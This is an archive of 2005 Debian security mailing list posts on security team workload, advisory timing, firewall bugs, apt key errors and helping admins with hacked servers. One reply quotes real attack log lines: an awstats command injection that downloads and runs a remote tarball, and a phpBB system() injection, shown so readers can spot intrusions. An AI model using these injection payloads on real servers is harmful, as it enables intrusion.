On Mon, Sep 19, 2005 at 09:18:29PM +0200, No?l K?the wrote: > anybody knows what's the problem with klecker/security.d.o? http://lists.debian.org/debian-curiosa/2005/09/msg00018.html There is an advisory pending ... Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Unusual incoming traffic detected from klecker.debian.org and sou rce.rfc822.org
On Wed, Sep 14, 2005 at 10:51:19AM +0200, Mathieu JANIN wrote: > I was updating my system at that time, but klecker.debian.org is not in my > sources (or perharps with an other name). klecker.debian.org is security.debian.org, which might explain it? Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Bad press again...
Florian Weimer wrote:
> * Steve Wray:
>
>
>>>>I view this as a security problem because what if you *think* you've
>>>>made changes to your firewall and are now protected only... you arn't
>>>>and the firewall hasn't been updated?
>>>>
>>>>Is that enough of a security problem for the fix to get into stable?
[snip]
>>When the fwbuilder application tries to write to the file, it fails.
>>This exception doesn't appear to be handled by anything at all and hence
>>the silent failure to write to the file.
>>
>>The issue of actually testing firewall configurations is a whole 'nother
>>problem.
>
>
> But you agree that automated tests of the configuration, after it has
> been written and applied, would detect such a problem (if there are
> proper test cases, of course)?
Regression testing of firewall rules would have to be the 'holy grail'
of the work we do here, where there are approximately one bazillion
firewalls to manage, with regular changes to production systems.
It'd need some serious AI programming though and probably some sort of
netfilter simulator. It shouldn't be too hard to implement in an
appropriate language. Prolog or one of the 'constraint programming'
languages perhaps. But this, while fascinating, is getting way off topic
:)
> I'm NOT saying that the bug shouldn't be fixed. What I want to say
> that the mere occurrence of such a bug is a symptom of a larger
> problem in the software. If we start labeling such symptoms as
> security bugs, we can probably issue five DSAs a week for ordinary
> bugs in software which is somewhat security-related. ("GnuPG crashes,
> and users might skip verification of a signature on an important
> document, putting them at risk" -- is this really a security bug?)
This is very true and pretty well what I'm getting at. I don't believe
that there can be any hard and fast rules as to what counts as enough of
a bug to count as a security bug. Its down to people making decisions.
In the end, I imagine that a lot of production sites out there are
*having* to move to debian 'backports'. They certainly were for woody...
Now is *that* good for anyone concerned? I don't believe that it is; the
backport packages probably don't get anywhere near the QA that packages
that actually go into 'stable' get.
Sometimes I get the feeling that the end user must choose between
reliability and security which is, in truth, a total oxymoron.
I just get the feeling that things today move too fast to hold any
distribution to a very strict interpretation of 'stable'.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Bad press again...
Florian Weimer wrote: > * Steve Wray: > > >>Another example is fwbuilder which *silently* fails to overwrite its >>generated script at compile time if the user doesn't have write >>permissions on the existing script. > > > Most bugs in security tools are security bugs. We have to draw a line > somewhere, otherwise "stable" becomes meaningless. Actually, having followed the mozilla/firefox discussion and various other thread on this list, I am inclined to believe that the concept of a "stable" distribution in the modern internet/open source environment is already meaningless. >>I view this as a security problem because what if you *think* you've >>made changes to your firewall and are now protected only... you arn't >>and the firewall hasn't been updated? >> >>Is that enough of a security problem for the fix to get into stable? > > > The underlying problem seems to be that fwbuilder does not provide > means to test a configuration after it has been applied to the system. > Such tests would catch a more general class of problems, and not just > some isolated file system problem. Not quite. When the fwbuilder application tries to write to the file, it fails. This exception doesn't appear to be handled by anything at all and hence the silent failure to write to the file. The issue of actually testing firewall configurations is a whole 'nother problem. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Bad press again...
Florian Weimer wrote: > * Michael Stone: > > >>Contact the security team. Describe the bug in such a way that the >>security team understands its severity and impact. It is not sufficient >>to say "just trust me and issue an advisory". From what I've seen so far >>this is not the obvious buffer overflow sort of bug, it's a configured >>behavior which deviates from some documented expectation. The question, >>then, is how that deviation occurs, what the documented expectation is, >>and (most importantly for stable) is there any chance that someone might >>be relying on the implemented behavior rather than the documented >>behavior. > > > It seems that shorewall generates an ACL that ACCEPTs all traffic once > a MAC rule matches. Further rules are not considered. The > explanations in version 2.2.3 seem to indicate that this was the > intended behavior, but its implications surprised upstream, and a > corrected version was released. > > IMHO, Debian should publish at least a DSA that explains this > discrepancy, especially if the package maintainer also thinks that > it's necessary. It seems to be fairly tricky to determine how much of a security risk a bug has to be before a fix will find its way into stable. Another example is fwbuilder which *silently* fails to overwrite its generated script at compile time if the user doesn't have write permissions on the existing script. I view this as a security problem because what if you *think* you've made changes to your firewall and are now protected only... you arn't and the firewall hasn't been updated? Is that enough of a security problem for the fix to get into stable? Who decides? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Bad press again...
On Mon, Aug 29, 2005 at 11:46:24AM -0500, Branden Robinson / Debian Project Leader wrote: > As far as I know, the stable/oldstable security team was never (recently) > down to Joey S. alone. Mike Stone and Steve Kemp have been active members > for some time (Steve was, as I understand it, promoted from secretary to > full member within the past couple of months). Steve (me) still remains a secretary, rather than a full member. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: On Mozilla-* updates
On Sun, Jul 31, 2005 at 06:18:18PM +0100, antgel wrote: > Any chance of an elaboration? I wasn't privy to any previous discussion > on this and I'm interested. What's the problem with searching bugzilla > for security patches on given versions, and applying them? Is it the > sheer volume? http://kitenet.net/~joey/blog/entry/bug_hiding_systems-2005-07-30-06-25.html Summery: Even when new fixed packages are available the original bugs reported in Mozilla's BugZilla system are non public, as are patches. Mozilla *appears* to have no interest in supply patches which *only* fix security holes to distributors. Their line is more "upgrade to the newest version". Whilst the new versions do fix the holes, they traditionally also break things built against them, such as extensions, galeon, etc. Which is why we're seeing the problem now. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: a compromised machine
On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote: > Since the process runs as "www-data" some kiddy has abused a web service > on your server to download and run an external software. Look for > suspicious log lines of your web server. Yes .. > Examples of hacks on our servers: > > 82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET > /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 > HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT > 5.1; SV1; FunWebProducts)" > 211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET > /phpbb/viewto > pic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252ech > r(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)% > 252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 > HTTP/ > 1.0" 200 28732 "-" "PHP/4.3.4" > > It should be rather easy finding signs of weird accesses like %20 or > chr(). Also look for weird signs in /tmp. Both of these attacks could be prevented by the use of mod_security, which I'd recommend you look into using in the future if you have potentially untrusted scripts running. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: My machine was hacked - possibly via sshd?
On Wed, Jul 20, 2005 at 10:17:56AM -0700, Brent Bates wrote: > This morning my machine was also compromised in a similar fashion as > described in your post here. > > http://lists.debian.org/debian-security/2005/03/msg00112.html > > Was the point of entry ever determined? That one seemed to be a fairly obvious weak password which was escalated into a root attack via a local kernel flaw. > I just happened to log onto my machine while this was taking place. I did > a ps and killed everything except non essential processes and mounted a > directory tree I had with known good binaries and used those to poke > around the machine. > > I have no idea how they got in, there were a lot of processes running as > nobody. I really only run apache as nobody, so that could be the point of > entry. What CGI / PHP / scripts are you running with Apache? > root 955 1 0 Jan10 ?00:00:11 /usr/local/apache/bin/httpd That's not a Debian package . > root 1471 1 0 Jan10 ?00:00:00 /usr/local/snmp/sbin/snmpd Neither is that. If you're going to run non-Debian packages you must keep track of them and make sure they are up to date. Have you done so ..? > bates24862 24857 0 Jul11 ?00:00:00 ./server_linux > -PID=tsserver2.pi > root 16095 955 0 Jul18 ?00:00:00 /usr/local/sbin/cronolog > --perio Don't recognise either of those. > nobody4824 4752 0 06:40 ?00:00:00 ./ptr3 > nobody4825 4824 0 06:40 ?00:00:00 [ptr3 ] > nobody4826 4824 0 06:40 ?00:00:00 [ptr3 ] Local kernel exploitation attempts ..? > root 4920 1 0 06:41 ?00:00:00 chmod 755 /usr/local/bin/ssh2 > root 4925 4920 0 06:41 ?00:00:00 [chmod ] > root 4927 1 0 06:41 ?00:00:00 mv -f sshd /usr/sbin/sshd > root 4929 1 0 06:41 ?00:00:00 chown root.bin /usr/sbin/sshd Trojan installation ..? > nobody4967 4964 0 06:42 ?00:00:00 perl clean 220.228.110.11 2025 IP address of attacker ..? > nobody5030 5005 0 06:43 ?00:00:00 ./traci > nobody5031 5030 0 06:43 ?00:00:00 ./traci > nobody5032 5030 0 06:43 ?00:00:00 [traci ] > root 5033 5030 0 06:43 ?00:00:00 [modprobe ] Kernel attempt again ..? Lots of detail there .. but it is a bit hard to understand without more knowlege of what is upon your system, etc. My immediate suggestion would be to disconnect the machine from the network, and proceed from there. If you have a tripwire/aide/checksumming installation in place you can use that to detect binary modifications by booting from a known-good media. If not your best option is to try to determine what route the attacker used to get in, make sure you're comfortable you can close it, and then reinstall. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Light weight IDSes and then some
On Fri, Jul 15, 2005 at 11:58:26AM -0500, George P Boutwell wrote: > The Security Debian How-To mentions Tripwire. Looking at AIDE and > Tripwire in the debian packages repositories it's hard to tell the > difference. I'm sure they both do the job, anyone with experience > with both these packages can describe some of the pros and cons of > each? Simple introduction to both aide, and integrit: http://www.debian-administration.org/articles/49 It doesn't mention tripwire, which is a shame. But I'll try to update it later. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Timeliness of Debian Security Announceness? (DSA 756-1 Squirrelmail)
On Thu, Jul 14, 2005 at 05:40:22PM +0200, Herwig Wittmann wrote: > This would be very convenient- but the delay that seems to have passed > between the original squirrelmail security announcement and the time I > received the alert via [EMAIL PROTECTED] is worrying: > > The Vulnerability seems to have been described a few weeks ago: > http://www.squirrelmail.org/security/issue/2005-06-15 > > The Debian Security Advisory 756-1 is dated July 13th, 2005. This has been discussed already in the archives, you should probably refer to those rather than reviving the subject. eg the following three threads: http://lists.debian.org/debian-security/2005/06/msg00055.html http://lists.debian.org/debian-security/2005/06/msg00097.html http://lists.debian.org/debian-security/2005/06/msg00142.html > I do not want to rude in any way- please try to excuse my way of putting > things, but does anybody have a prediction how probable it is for such a > thing to happen again? It's unknown whether the build infrastructure problems will recur, machines do die so it's possible. The communication problems leading to various misunderstandings I hope will be less likely to reoccur. > Is there a role/function in debian that is responsible for reviewing > bugtraq or similiar sources, and is ensured that this role is fulfilled > every day? The security team do follow bugtraq, etc. Filing bugs with patches is a useful thing to do - but forwarding a message that has been posted publically already is perhaps less useful. It's not like there's not enough spam mail sent to [EMAIL PROTECTED] already ;) > Or will there be other measures in place to see that security issues are > noticed quickly for all packages- even for strange tools that > are not used by normal unix-centered developers? I'm unsure exactly what you are suggesting about less popular tools. Sure if five issues need fixing simultaneously the "less used" is liable to suffer if there's a more important bug. Still even less popular tools are supported, all packages should receive updates eventually. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 742-1] New cvs packages fix arbitrary code execution
Hallo, Ik ben op vakantie tot 20 juli. Voor support vragen kunt u contact opnemen met onze supportdesk. Voor sales en andere vragen kunt u mailen naar [EMAIL PROTECTED] Met vriendelijke groet, Steve Karnadi Hello, I am on vacation until the 20th of July. You can contact our supportdesk for support questions. Sales questions or other questions can be sent to [EMAIL PROTECTED] Regards, Steve Karnadi -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: gpg-errors with apt
On Thu, Jul 07, 2005 at 02:14:51PM +0200, Johann Spies wrote: > Ok, but the archive on archive3.sun.ac.za is just a mirror from a > primary debian upstream source. Do I have to generate a spesific key > for my server? Strange .. but no you need do nothing with your key(s). > > > NO_PUBKEY 07DC563D1F41B907 W: You may want to update the package lists > > > to correct these missing files > > > > Find the key that the archive is signed with, import it as you > > did for the main Sid/Etch archive and all should be well. > > And where do I find this key? gpg --keyserver some.key.server --recv-keys 07DC563D1F41B907 (For keyservers I use: keyring.debian.org pgp.mit.edu pgpkeys.pgp.net wwwkeys.uk.pgp.net or wwwkeys.pgp.net ) Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: gpg-errors with apt
On Thu, Jul 07, 2005 at 12:22:36PM +0200, Johann Spies wrote: > I have read http://www.debian-administration.org/articles/174 about > this topic and have done what the article suggested: > "~# gpg --keyserver keyring.debian.org --recv 4F368D5D" This imports the key for the Debian Unstable archive. > Got a timeout here. Firewall? > "Or if you wish you can download it from the internet, from > http://www.debian.org/releases/ - > towards the bottom of the page there's a link to the file > "ziyi_key_2005.asc". > > Download this and import it as follows: > > [EMAIL PROTECTED]:~# cat ziyi_key_2005.asc | gpg --import" (Bad '"' on the end of that command line.. mistake in copy + paste?) > I have done this but I still get the following on aptitude update (on > sid): > > W: GPG error: ftp://archive3.sun.ac.za unstable Release: The following > signatures couldn't be verified because the public key is not > available: NO_PUBKEY F1D53D8C4F368D5D This is a completely different key - here the complain is that the archive you have in your apt.sources list, for archive3.sun.ac.za, is signed with a key 'F1D53D8C4F368D5D' which you don't have imported. >W: GPG error: > ftp://archive3.sun.ac.za unstable Release: The following signatures > couldn't be verified because the public key is not available: And the error says as much. The signature isn't verified because you're missing the key. > NO_PUBKEY 07DC563D1F41B907 W: You may want to update the package lists > to correct these missing files Find the key that the archive is signed with, import it as you did for the main Sid/Etch archive and all should be well. > Is this a bug or how do I solve this problem? Not a bug with the *Debian* archive, but a missing key on your side from the look of things.. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 741-1] New bzip2 packages prevent decompression bomb
Hallo, Ik ben op vakantie tot 20 juli. Voor support vragen kunt u contact opnemen met onze supportdesk. Voor sales en andere vragen kunt u mailen naar [EMAIL PROTECTED] Met vriendelijke groet, Steve Karnadi Hello, I am on vacation until the 20th of July. You can contact our supportdesk for support questions. Sales questions or other questions can be sent to [EMAIL PROTECTED] Regards, Steve Karnadi -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Firewall-troubleshooting
On Sat, Jul 02, 2005 at 04:46:29PM -0400, KC wrote: > I need help understanding what goes wrong in this script. I cannot ping > anyone and cannot resolve as well. In fact I believe the only thing I can > get is an ip address from my isp's dhcp server. There's no way I'm going to read through all of that and try to understand it. Perhaps you'd be better off starting with a smaller firewall script and then adding to it as you need? One thing did stand out though, you don't allow outgoing connections generally. These lines: > iptables --policy OUTPUT DROP > iptables -t nat --policy OUTPUT DROP > iptables -t mangle --policy OUTPUT DROP They seem to say "no output except that which is explictly allowed". For a big network I too would restrict outgoing connections, but for a home machine with only trusted hosts? It's an additional complication which doesn't gain you much. (Sure if you had a trojan which phoned home, or tried to compromise other hosts .. it would help. But .. in general it less useful than it appears). Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Bad press related to (missing) Debian security
On Mon, Jun 27, 2005 at 09:05:53PM +0200, martin f krafft wrote: > > The secretary position was originally created to help this > > situation, but it was never really clear to me what my role was > > supposed to be. > > I never understood it either. > > How much information can be disclosed about the inner workings of > the security team without damage? I don't see that the workings of the team itself are particular sensitive, only the actual packages being worked upon. (Responsible disclosure / coordinated releases, etc). A long time ago I wrote a small introduction to how it works, none of it is suprising, and none of it is sensitive in any way that I can see: http://people.debian.org/~skx/team.html Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Bad press related to (missing) Debian security
On Mon, Jun 27, 2005 at 08:39:43PM +0200, Marek Olejniczak wrote: > I don't understand the philosophy of Debian security team. It's really so > difficult to push into sarge spamassassin 3.0.4 which is not vulnerable? > This version is in Debian testing and why this version can't be push into > stable? In some cases fixing a problem, which an upstream will not, or which the package maintainer cannot is *very* hard work. (eg. Mozilla/ Kernel images). In this particular case pushing the package itself isn't a hard job - the problem we're currently seeing isn't that the job is hard, but that only a very small number of people have the authority/ability to push the update out. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Bad press related to (missing) Debian security
On Mon, Jun 27, 2005 at 02:36:12PM -0400, Noah Meyerhans wrote: > Even allowing uploads from the secretaries could be helpful. Definitely. I've got fixed packages available right now for some of the bugs which have been raised in this thread, but until somebody can push out the advisories they're just sat around gathering dust. > Part of the problem with security updates has to do with the fact that > it's just difficult to coordinate the work. That's probably true, and kinda an argument against suddenly adding more members too ... > The secretary position was originally created to help this situation, > but it was never really clear to me what my role was supposed to be. I admit the role of the position is also a mystery to me, but one that I've not worried too much about. Reviewing patches and building fixed packages is what I've tried to do - whether that is the intended job of a secretary is largely irrelevent. Other jobs like answering mails from people who say "Help my server is hacked" seem more "secreatrial" in nature, so I've tried to answer those as time and details permit. Steve -- www.steve.org.uk -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: getting the MAC address from an ip
On Fri, Jun 24, 2005 at 02:52:40PM +0200, LeVA wrote: > How can I get a machines mac address, if I only know it's ip? If it's on your LAN ping it then look at your arp cache: [EMAIL PROTECTED]:~$ ping -c 1 192.168.1.1 >/dev/null [EMAIL PROTECTED]:~$ /usr/sbin/arp 192.168.1.1 Address HWtype HWaddress Flags Mask Iface sun ether 08:00:20:C2:1E:F6 C eth0 Or if you have a login you can use ifconfig to read it: [EMAIL PROTECTED]:~$ /sbin/ifconfig |grep HWaddr eth0 Link encap:Ethernet HWaddr 00:0A:E6:F6:A3:F4 If it's a remote host then you cannot Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: debian security archive/updates b0rken???
On Sun, Jun 19, 2005 at 12:31:23AM -0400, sean finney wrote: > please excuse this blatant cross-posting, i wouldn't do it if i didn't > think it were critical that i do so... > http://www.infodrom.org/~joey/log/?200506142140 > say it isn't so! It isn't so. It's true that the design of sbuild/wanna-build means there were no autobuilders available for stable-security at the moment of sarge's release, but there was already work in progress to fix this by the time that blog entry was posted, and the claim that "it looks like we'll be without security updates for quite a while" caused no small amount of consternation. TTBOMK, there is now again a full complement of stable-security autobuilders available on 11 archs, and autobuilders for testing-security on 10/11 archs. It doesn't look like the security team has issued any DSAs since then, though they may have done uploads that haven't yet been published (I wouldn't know, not having access to look on klecker). -- Steve Langasek postmodern programmer signature.asc Description: Digital signature
Re: Please allow drupal 4.5.3-1
On Fri, Jun 03, 2005 at 08:19:22AM +0200, Martin Schulze wrote: > Steve Langasek wrote: > > On Wed, Jun 01, 2005 at 07:16:00PM -0700, Ian Eure wrote: > > > On Wednesday 01 June 2005 04:54 pm, Hilko Bengen wrote: > > > > Just a few hours ago, the Drupal project has released version 4.5.3, a > > > > bugfix release which fixes a serious security bug. I have created and > > > > just uploaded a 4.5.3-1 package to unstable. Updated Debconf > > > > translations are the only additional changes over 4.5.2-3 which is > > > > the version in sarge. > > > Any reason why you can't just apply the patch to fix that specific bug? > > > And you probably want to be emailing the release team... > > He did contact the release team; unfortunately, the diff between 4.5.2 and > > 4.5.3 is rather large and I don't believe it's all security-related, so I > > think this will have to be left for the security team after all. > Umh, the release team most probably has even stricter rules than the ^^^ security, I guess :) > release team when it comes to cluttering the diff... Absolutely -- but the release team has a deadline before which the fix must be in unstable in order for it to be included in sarge (and if everything goes according to plan, this deadline is in 12 hours), whereas you can take as much time as you want to going back and forth with the maintainer until he gets it right. :) -- Steve Langasek postmodern programmer signature.asc Description: Digital signature
Re: Please allow drupal 4.5.3-1
On Wed, Jun 01, 2005 at 07:16:00PM -0700, Ian Eure wrote: > On Wednesday 01 June 2005 04:54 pm, Hilko Bengen wrote: > > Just a few hours ago, the Drupal project has released version 4.5.3, a > > bugfix release which fixes a serious security bug. I have created and > > just uploaded a 4.5.3-1 package to unstable. Updated Debconf > > translations are the only additional changes over 4.5.2-3 which is > > the version in sarge. > Any reason why you can't just apply the patch to fix that specific bug? > And you probably want to be emailing the release team... He did contact the release team; unfortunately, the diff between 4.5.2 and 4.5.3 is rather large and I don't believe it's all security-related, so I think this will have to be left for the security team after all. Thanks, -- Steve Langasek postmodern programmer signature.asc Description: Digital signature
Re: Security issue with 'elog' package
On Wed, May 04, 2005 at 12:15:15AM +0300, Recai Oktas wrote: > I uploaded the new upstream of Elog a few days ago (this is a sponsored > package). I've just noticed a possible security flaw which affects both > versions in testing (2.5.7+r1558) and unstable (2.5.8+r1637), as can be > seen in the following CVS log of r1.638: > http://midas.psi.ch/cgi-bin/cvsweb/elog/src/elogd.c > Since the fix[1] is so trivial to backport, I can easily prepare a new > package for just the version in testing. Please do so, unless you can point us to a release-critical bug addressed by the version currently in unstable. Thanks, -- Steve Langasek postmodern programmer signature.asc Description: Digital signature
Re: Apache 1.3.33 (from sarge) and mod_chroot
I've had good luck with nullmailer for just this situation. It's simple and lightweight, works well in chroot. Steve === = Home Page: http://www.braingia.org/= === On Thu, Mar 24, 2005 at 07:31:03AM +0100, Krzysztof J??wiak wrote: > Hello! > > My web server was hacked a few days ago and I decided to install some > new program and modules which improve security. > I find in sarge libapache-mod-chroot which chroot apache (and it work > fine) but I can't send mail from php. > I installed ssmtp in chroot (I think so) in chroot environment but it > doesn't help :( > > Does anyone use this module? Perhaps I do something wrong with it ssmtp... > > -- > Krzysztof Jozwiak > Debian administrator > > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Apache 1.3.33 (from sarge) and mod_chroot
On Thu, Mar 24, 2005 at 07:31:03AM +0100, Krzysztof J??wiak wrote: > My web server was hacked a few days ago and I decided to install some > new program and modules which improve security. Good plan. Did you find the source of the attack? If not you're at risk from a repeat of the previous one .. > I find in sarge libapache-mod-chroot which chroot apache (and it work > fine) but I can't send mail from php. > I installed ssmtp in chroot (I think so) in chroot environment but it > doesn't help :( I can't help you there, but I would suggest you look at mod-security, you can find it in Sarge. The homepage has lots of documentation, and it includes chroot functionality: http://www.modsecurity.org/ There's a brief introduction here: http://www.debian-administration.org/?article=65 Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Analysis vulnerabilities associated to published security advisories, anyone?
On Wed, Mar 09, 2005 at 08:05:40PM +0100, David Schmitt wrote: > On Wednesday 09 March 2005 19:13, Steve Kemp wrote: > > A simple script I wrote did that for me already - although there are > > some fixups required as we seem to have a few different spellings > > for different things. eg. sanitizing vs sanitising. > > > > You can see the simple output here along with input and output. > > > > http://people.debian.org/~skx/2005/ > > Nice script. I fixed it up to sanitise 'sanitizations' and sort output by > count. diff attached. Thanks, I've applied it and updated the page. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Analysis vulnerabilities associated to published security advisories, anyone?
On Wed, Mar 09, 2005 at 12:25:06PM +0100, Javier Fern?ndez-Sanguino Pe?a wrote: > Maybe you've seen it already, but the guys at Ubuntu have done a > light-weight analysis of the vulnerabilities they have been released since > "Warty" was released: https://www.ubuntulinux.org/wiki/USNAnalysis A nice page. > This analysis does not match the one on ICAT's database > (http://icat.nist.gov/icat.cfm?function=statistics) but probably is related > to the fact that a lot of tempfile races have been found and reported > recently by the Security Audit team. Yes. > I would like somebody to do a similar analysis regarding Debian's > vulnerabilities (Ubuntu vulns are probably a subset of those affecting > woody). Has anyone enough spare time? I'd be interested in helping out, it seems like it shouldn't take too long to break things down into the type of the vulnerability and local vs. remote. A simple script I wrote did that for me already - although there are some fixups required as we seem to have a few different spellings for different things. eg. sanitizing vs sanitising. You can see the simple output here along with input and output. http://people.debian.org/~skx/2005/ I'd be interested in average advisories per week, as well as classification on the actual output. (Seems like buffer overflows are still the biggest reported thing for this year - although you've done a good job at showing temporary file issues). Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
